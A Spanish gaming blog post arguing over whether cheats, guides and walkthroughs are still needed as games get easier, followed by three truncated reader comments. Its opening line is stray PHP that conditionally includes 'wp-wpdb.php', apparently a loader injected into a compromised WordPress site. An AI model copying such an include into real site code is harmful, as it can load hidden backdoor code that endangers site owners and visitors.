if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); ¿Son necesarios los trucos hoy en día? – La Fortaleza de LeChuck

¿Son necesarios los trucos hoy en día?

Nuevas generaciones de juegos, de gráficos, formatos digitales, DLC… todo eso está muy bien, pero con toda la consecuente accesibilidad que se quiere dotar a los videojuegos también se está perdiendo en la mayoría, la dificultad a la hora de terminarlos. Antiguamente pasarse un videojuego era un auténtico reto, y con ello, visionar el final, un total éxtasis.

Hoy en día, pasa todo lo contrario, al finalizar la mayoría de juegos te quedas con cara de tonto y vas «a por otro», desaparece esa sensación de haber pasado un gran obstáculo, ¿como puede sentirse uno hardcore gamer así?. Los trucos y las guías eran usuales si te atascabas o perdías la fe en pasar por ti mismo ese duro videojuego. Se echan de menos aquellas mágicas combinaciones de botones que buscábamos en las ultimas páginas de nuestra revista favorita para sacar un poco más el jugo a ese juego que no logramos superar, pero han pasado a no ser necesarios. Pues bien, dejando de lado esos momentos mágicos, se ha dado paso a las guías paso a paso, primero eran en papel, que nos guiaban en los videojuegos más laberínticos y eso se ha ido convirtiendo, con la evolución de la tecnología, del papel a las páginas de video en streaming más conocidas, como Youtube, que acoge miles de «gameplays» de gente que comparte sus partidas y sus guías «paso a paso», busca el «Walkthrough» de ese juego, es la mejor guía que podría haber.

Si querías acabar facilmente con la gracia de «Los Sims»solamente tenías que usar «rosebud»
Pero entonces, son los juegos  más fáciles y accesibles, o ¿simplemente tenemos menos tiempo para exprimirlos y, por pereza, preferimos usar trucos o guías? Está claro, hay de todo, y además muchos juegos presentan retos de diversas formas para quien quiera realmente exprimirlos, como los juegos con logros/trofeos que dan una nueva satisfacción a los jugadores más insaciables. No pretendo devaluar estas puntuaciones de la era moderna, pero ¿es igual de divertido sacar un logro de «Mira 200 horas al techo sin parpadear» que acabar un juego difícil a base de aprender y mejorar nuestra habilidad?
En este mando se pulsaron, seguramente, los mejores trucos de la historia
Ha quedado claro, no soy amante de los logros/trofeos, aunque reconozco que hace gracia cuando saltan mientras estás jugando, pero no me vuelvo loco por ellos, y menos como para repasar un juego tres veces por ese motivo, si no voy a disfrutarlo. Tampoco soy amante de la dificultad simple, esa de que un enemigo te toque una vez y mueras y tengas que reiniciar el juego o el nivel. Sí soy seguidor del tipo de dificultad de calidad, con puzzles de por medio, que mida mi habilidad y mi inteligencia, pero no de esa dificultad extrema que solo quiere hacer añicos tu creencia de que eres un crack con esto de los videojuegos.
Hoy te vamos a enseñar a hacer el pino-puente
¿Que soluciones hay para todo esto? Seamos constructivos, realmente hoy en día hay juegos para todos los gustos, y hay juegos que no está mal que te enseñen un poco los controles o lo que debes hacer a continuación, siempre que lo hagan fluidamente y a elegir por el jugador. Por poner un ejemplo, los tutoriales de Assassin’s Creed son un ascazo, te pasas media hora haciendo el tonto en la máquina virtual y luego a jugar. ¿Que sucede?, los tutoriales tienen que ocurrir durante el juego, no antes del juego, porque luego nisiquiera te acuerdas y tienes que volver a consultar. Han de salir de forma natural, como por ejemplo lo hace cualquiera de los ultimos Grand Thef Auto. Éstos te comentanarriba de una forma nada instrusiva, a donde deberías ir, o si te ve en apuros, que botón debes presionar para hacer la siguiente acción. Efectivo y práctico. ¿Alguien usó la guía DVD que regalaban con Super Mario Galaxy 2? Era una especie de Walktrough, pero curiosamente no podías reproducirlo en tu Wii, era un DVD video normal. No se para que se le ocurrió gastarse un euro a Nintendo en algo que nadie iba a utilizar, da una pereza tremenda verlo en el DVD, además de que los juegos de Mario son tan accesibles como uno quiera que sean. Estoy de acuerdo de que los Mario 3D pueden costar mucho más al tener más posibilidades que los 2D, pero es que no se puede hacer más accesible ya, al menos no sin sacrificar a los videojugadores de toda la vida. El que no lo juega es porque no quieren ni le interesa. 
 ¿Que opinas? ¿Usas trucos? ¿Desbloqueas logros?¿Miras walkthroughs en Youtube? Tranquilo, no por ello dejas de ser hardcore gamer, no se trata de eso, se trata de algún modo, de disfrutar de ese juego que has comprado, aunque los programadores a veces se empeñen en amargártelo creyendo que así lo pasas mejor.

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

12 comentarios

  1. aun recuerdo esos momento en el silent hill o ene l parasite eve en los q tenias q usar la guia si no querias estar paseando por una habitacion eternamente , ocuando eras peuqeño y te tenias que enfrentar a un juego en ingles sabiendo unicamente el verbo to be jajajajaajajaj , benditas guias.

  2. Yo, que soy bastante jovencillo, no tuve la oportunidad de jugar en esa cosa que vosotros llamáis "Spectrum", sino que mi primera consola de verdad fue la GameBoy Advance.
    Y sí, noto perfectamente como un juego de ahora me lo paso con nada (o me es imposible porque lo exageran) y me pongo a jugar clásicos, como Metal Gear, y soy un paquete de cuidao, o Monkey Island y muero dando

  3. Los trucos de ahora son de risa! Dónde están esos trucos que requerían habilidad en los dedos?! Recuerdo el de Dragon Ball japo, que para que te apareciera Goku (creo que era goku normal o super guerrer xD) tenías que hacer una combinación chunga a la velocidad de la luz. Si lo habías hecho bien, sonaba "kakaroto"!

    Además con lo fácil que son los juegos hoy en día, los

Dejar un comentario